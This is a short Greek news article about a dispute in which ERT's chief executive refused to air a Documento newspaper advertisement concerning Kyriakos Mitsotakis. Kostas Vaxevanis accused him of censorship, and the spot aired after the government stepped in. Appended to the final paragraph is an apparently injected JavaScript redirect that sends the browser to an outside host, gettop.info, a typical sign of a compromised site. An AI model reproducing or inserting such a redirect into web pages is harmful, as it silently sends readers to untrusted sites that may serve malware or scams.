Ο «πόλεμος» Βαξεβάνη -Ταγματάρχη για «Documento» και Κυριάκο

0
1

 

Ο «πόλεμος» Ταγματάρχη -Βαξεβάνη για τη διαφήμιση της εφημερίδας Documento, που η ΕΡΤ αρνείτο να προβάλει, έληξε με πλήρη υποχώρηση του διευθύνοντος συμβούλου της κρατικής ραδιοτηλεόρασης.

Η «σύρραξη» ξεκίνησε όταν η ΕΡΤ -επικαλούμενη γνωμοδότηση τής νομικής της υπηρεσίας- είπε «όχι» στη μετάδοση τηλεοπτικού σποτ τής εφημερίδας, που διαφήμιζε το πρωτοσέλιδό της για τον Κυριάκο Μητσοτάκη και ρεπορτάζ για τραπεζικό σκάνδαλο εκατομυρίων ευρώ.

Η απόφαση προκάλεσε τη σφοδρότατη αντίδραση του Κώστα Βαξεβάνη, που κατήγγειλε τον Λάμπη Ταγματάρχη για… λογοκρισία, 42 χρόνια μετά το τέλος της λογοκρισίας, και καλούσε τον ίδιο τον πρωθυπουργό να πάρει θέση.

Το θέμα έκλεισε όταν η κυβέρνηση τράβηξε το «αυτί» της διοίκησης της ΕΡΤ, διαμηνύοντας ότι δεν υπάρχει κανένα πρόβλημα προσβολής του αρχηγού της αντιπολίτευσης. Έτσι, το διαφημιστικό σποτ άρχισε να μεταδίδεται κανονικά. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ